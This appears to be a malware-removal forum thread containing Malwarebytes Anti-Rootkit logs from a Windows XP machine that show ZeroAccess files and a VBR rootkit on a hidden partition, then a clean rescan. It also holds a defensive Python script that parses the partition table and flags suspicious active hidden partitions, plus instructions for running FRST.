DevicePointer: 0xffffffff85236940, DeviceName: \Device\Ide\IdeDeviceP4T0L0-12\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Done!
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: C9C06833

Partition information:

    Partition 0 type is Other (0x12)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 20971520

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 20973568  Numsec = 291587072

    Partition 2 type is HIDDEN (0x17)
    Partition is ACTIVE.
    Partition starts at LBA: 312560640  Numsec = 21152
    Partition is not bootable
Infected: VBR on Hidden active partition --> [unknown.Rootkit.VBR]
Physical drive 0 is not bootable
Bootable physical drive, other than a system drive has been found

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

MBR infection found on drive 0
Disk Size: 160041885696 bytes
Sector size: 512 bytes

Scanning physical sectors of unpartitioned space on drive 0 (1-2047-312561808-312581808)...
Done!
Physical Sector Size: 0
Drive: 1, DevicePointer: 0xffffffff84e9e2d0, DeviceName: \Device\Harddisk1\DR4\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85030718, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff84e9e2d0, DeviceName: \Device\Harddisk1\DR4\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff84ed9d08, DeviceName: \Device\00000070\, DriverName: \Driver\USBSTOR\
------------ End ----------
Physical Sector Size: 0
Drive: 2, DevicePointer: 0xffffffff85124120, DeviceName: \Device\Harddisk2\DR5\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85250b78, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff85124120, DeviceName: \Device\Harddisk2\DR5\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff85250030, DeviceName: \Device\00000071\, DriverName: \Driver\USBSTOR\
------------ End ----------
Infected: C:\WINDOWS\system32\c_68825.nls --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\@" is compressed (flags = 1)
Read File: File "c:\windows\$ntuninstallkb877$\395111198\loader.tlb" is compressed (flags = 1)
Read File: File "c:\windows\$ntuninstallkb877$\395111198\l\aatagjfo" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\l\aatagjfo --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@00000001" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@00000001 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000c0" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000c0 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000cb" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000cb --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000cf" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000cf --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@80000000" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@80000000 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000c0" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000c0 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000cb" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000cb --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000cf" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000cf --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\2860961191 --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198 --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\@ --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\loader.tlb --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\l --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\u --> [backdoor.0Access]
Scan finished
Creating System Restore point...
Cleaning up...
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Executing an action fixdamage.exe...
Success!
Queuing an action fixdamage.exe
Removal scheduling successful. System shutdown needed.
System shutdown occurred
=======================================


---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 344899584

Initializing...
=======================================
------------ Kernel report ------------
     03/20/2014 17:48:32
------------ Loaded modules -----------
\WINDOWS\system32\ntkrnlpa.exe
\WINDOWS\system32\hal.dll
\WINDOWS\system32\KDCOM.DLL
\WINDOWS\system32\BOOTVID.dll
imofugc.sys
ACPI.sys
\WINDOWS\system32\DRIVERS\WMILIB.SYS
pci.sys
isapnp.sys
pciide.sys
\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
MountMgr.sys
ftdisk.sys
PartMgr.sys
VolSnap.sys
atapi.sys
disk.sys
\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
fltMgr.sys
sr.sys
MpFilter.sys
KSecDD.sys
WudfPf.sys
Ntfs.sys
NDIS.sys
Mup.sys
\SystemRoot\system32\DRIVERS\AmdPPM.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\usbohci.sys
\SystemRoot\system32\DRIVERS\USBPORT.SYS
\SystemRoot\system32\DRIVERS\usbehci.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\nvnetbus.sys
\SystemRoot\system32\DRIVERS\NVNRM.SYS
\SystemRoot\system32\DRIVERS\imapi.sys
\SystemRoot\system32\drivers\pfc.sys
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\system32\DRIVERS\redbook.sys
\SystemRoot\system32\DRIVERS\ks.sys
\SystemRoot\system32\DRIVERS\AGRSM.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\System32\Drivers\Modem.SYS
\SystemRoot\system32\DRIVERS\nv4_mini.sys
\SystemRoot\system32\DRIVERS\VIDEOPRT.SYS
\SystemRoot\system32\DRIVERS\clwvd.sys
\SystemRoot\system32\DRIVERS\audstub.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\DRIVERS\psched.sys
\SystemRoot\system32\DRIVERS\msgpc.sys
\SystemRoot\system32\DRIVERS\ptilink.sys
\SystemRoot\system32\DRIVERS\raspti.sys
\SystemRoot\system32\DRIVERS\termdd.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\swenum.sys
\SystemRoot\system32\DRIVERS\update.sys
\SystemRoot\system32\DRIVERS\mssmbios.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\system32\DRIVERS\NVENETFD.sys
\SystemRoot\system32\drivers\RtkHDAud.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\System32\Drivers\i2omgmt.SYS
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\DRIVERS\USBSTOR.SYS
\SystemRoot\System32\Drivers\Fs_Rec.SYS
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\system32\DRIVERS\i8042prt.sys
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\Drivers\mnmdd.SYS
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\rasacd.sys
\SystemRoot\system32\DRIVERS\ipsec.sys
\SystemRoot\system32\DRIVERS\tcpip.sys
\SystemRoot\system32\DRIVERS\netbt.sys
\SystemRoot\System32\drivers\afd.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\System32\Drivers\Fips.SYS
\SystemRoot\system32\DRIVERS\ipnat.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\System32\Drivers\Cdfs.SYS
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_WMILIB.SYS
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\System32\watchdog.sys
\SystemRoot\System32\drivers\dxg.sys
\SystemRoot\System32\drivers\dxgthk.sys
\SystemRoot\System32\nv4_disp.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\drivers\wdmaud.sys
\SystemRoot\system32\drivers\sysaudio.sys
\SystemRoot\system32\DRIVERS\mrxdav.sys
\??\C:\WINDOWS\system32\drivers\int15.sys
\SystemRoot\system32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\npf.sys
\??\C:\Program Files\Free Ride Games\X4HS32Ex.Sys
\??\c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5EEF60F5-22C5-471C-900A-286C4260DD8F}\MpKsl4d344a32.sys
\SystemRoot\System32\Drivers\HTTP.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\SystemRoot\system32\drivers\kmixer.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
\WINDOWS\system32\ntdll.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk2\DR4
Upper Device Object: 0xffffffff83c0e030
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000070\
Lower Device Object: 0xffffffff84f39128
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR3
Upper Device Object: 0xffffffff84f71030
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\0000006f\
Lower Device Object: 0xffffffff84dec030
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xffffffff8528bab8
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP4T0L0-12\
Lower Device Object: 0xffffffff8528c940
Lower Device Driver Name: \Driver\atapi\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff8528bab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85280900, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff8528bab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff852f4658, DeviceName: \Device\00000063\, DriverName: \Driver\ACPI\
DevicePointer: 0xffffffff8528c940, DeviceName: \Device\Ide\IdeDeviceP4T0L0-12\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Done!
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: C9C06833

Partition information:

    Partition 0 type is Other (0x12)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 20971520

    Partition 1 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 20973568  Numsec = 291587072
    Partition is not bootable

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

Disk Size: 160041885696 bytes
Sector size: 512 bytes

Scanning physical sectors of unpartitioned space on drive 0 (1-2047-312561808-312581808)...
Done!
Physical Sector Size: 0
Drive: 1, DevicePointer: 0xffffffff84f71030, DeviceName: \Device\Harddisk1\DR3\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff84d74020, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff84f71030, DeviceName: \Device\Harddisk1\DR3\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff84dec030, DeviceName: \Device\0000006f\, DriverName: \Driver\USBSTOR\
------------ End ----------
Physical Sector Size: 0
Drive: 2, DevicePointer: 0xffffffff83c0e030, DeviceName: \Device\Harddisk2\DR4\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85163020, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff83c0e030, DeviceName: \Device\Harddisk2\DR4\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff84f39128, DeviceName: \Device\00000070\, DriverName: \Driver\USBSTOR\
------------ End ----------
Scan finished
 

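The "Inspecting partition table" block in the mbar logs above is where the infection actually shows: a fourth entry of type HIDDEN (0x17) that is marked ACTIVE, sits in the last few sectors of the disk and carries an infected VBR, while the real NTFS system partition (Primary, 0x7) is not active. After CleanUp the hidden entry is gone and Partition 1 is active. The following Python script is an added example, written for this thread; it is not code from Malwarebytes or from the forum helper. It parses that block and applies the two checks that distinguish the two logs. The two log excerpts are transcribed from the thread's own before/after logs; the 2048-sector "tail of disk" threshold, the set of hidden type codes and all function names are my own assumptions.

```python
"""Parse the "Inspecting partition table" block of a Malwarebytes Anti-Rootkit
(mbar) log and flag partition entries that fit a bootkit-style layout."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample: partition block transcribed from the pre-cleanup log.
INFECTED_LOG = """\
    Partition 0 type is Other (0x12)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 20971520

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 20973568  Numsec = 291587072

    Partition 2 type is HIDDEN (0x17)
    Partition is ACTIVE.
    Partition starts at LBA: 312560640  Numsec = 21152
    Partition is not bootable
Infected: VBR on Hidden active partition --> [unknown.Rootkit.VBR]

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
Disk Size: 160041885696 bytes
Sector size: 512 bytes
"""

# Constructed sample: the same block transcribed from the post-reboot (cleaned) log.
CLEAN_LOG = """\
    Partition 0 type is Other (0x12)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 20971520

    Partition 1 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 20973568  Numsec = 291587072
    Partition is not bootable
Disk Size: 160041885696 bytes
Sector size: 512 bytes
"""

HEADER_RE = re.compile(r"Partition (\d+) type is (\w+) \(0x([0-9A-Fa-f]+)\)")
ACTIVE_RE = re.compile(r"Partition is (ACTIVE|NOT ACTIVE)\.")
EXTENT_RE = re.compile(r"Partition starts at LBA: (\d+)\s+Numsec = (\d+)")
DISK_RE = re.compile(r"Disk Size: (\d+) bytes")
SECTOR_RE = re.compile(r"Sector size: (\d+) bytes")
# Assumed set: MBR type codes whose 0x10 bit marks a "hidden" FAT/NTFS variant (0x17 = hidden NTFS).
HIDDEN_TYPES = {0x11, 0x14, 0x16, 0x17, 0x1B, 0x1C, 0x1E}


@dataclass
class Partition:
    index: int
    type_name: str
    type_code: int
    active: bool = False
    start_lba: int = 0
    num_sectors: int = 0
    scanner_not_bootable: bool = False  # mbar printed "Partition is not bootable"


def parse_partitions(text: str) -> List[Partition]:
    """Walk the block line by line; each 'Partition N type is' header opens a new entry.
    Unrelated lines (Infected:, Disk Size:, blanks) are skipped, and a repeated
    index (the scanner prints the hidden entry and then the empty slot 2) is kept."""
    parts: List[Partition] = []
    for raw in text.splitlines():
        line = raw.strip()
        if m := HEADER_RE.match(line):
            parts.append(Partition(int(m[1]), m[2], int(m[3], 16)))
        elif not parts:
            continue
        elif m := ACTIVE_RE.match(line):
            parts[-1].active = m[1] == "ACTIVE"
        elif m := EXTENT_RE.match(line):
            parts[-1].start_lba, parts[-1].num_sectors = int(m[1]), int(m[2])
        elif line == "Partition is not bootable":
            parts[-1].scanner_not_bootable = True
    return parts


def total_sectors(text: str) -> int:
    """Disk size in sectors, from the 'Disk Size' and 'Sector size' lines."""
    return int(DISK_RE.search(text)[1]) // int(SECTOR_RE.search(text)[1])


def assess(parts: List[Partition], disk_sectors: int, tail_sectors: int = 2048) -> List[Tuple[int, str]]:
    """Return (partition index, reason) pairs for entries worth a closer look.
    "Partition is not bootable" alone is deliberately NOT a trigger: the cleaned
    log prints it for the now-active NTFS system partition as well."""
    findings = []
    for p in parts:
        if p.num_sectors == 0:
            continue  # empty MBR slot
        end = p.start_lba + p.num_sectors
        if p.active and p.type_code in HIDDEN_TYPES:
            findings.append((p.index, f"active partition with hidden type 0x{p.type_code:02X}"))
        if p.active and disk_sectors - end <= tail_sectors:
            findings.append((p.index, f"active {p.num_sectors}-sector partition ending {disk_sectors - end} sectors before disk end"))
        if end > disk_sectors:
            findings.append((p.index, "partition extends past end of disk"))
    return findings
```

Run against the pre-cleanup excerpt the script reports the hidden entry twice (hidden type, and a 21152-sector active partition ending 16 sectors before the end of the 160 GB disk); against the post-reboot excerpt it reports nothing, even though that log also says "Partition is not bootable" for the active NTFS partition. The useful signal is the combination of the active flag with a hidden type or a tail-of-disk location, not the "not bootable" string by itself.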

Scan with FRST in normal mode

Please download Farbar's Recovery Scan Tool to your desktop: FRST 32bit or FRST 64bit (If not sure: Start --> Computer (right click) --> properties)

  • Run FRST.
  • Don't change any of the checkboxes and hit Scan.
  • Logfiles are created on your desktop.
  • Post the FRST.txt and (after the first scan only!) the Addition.txt.
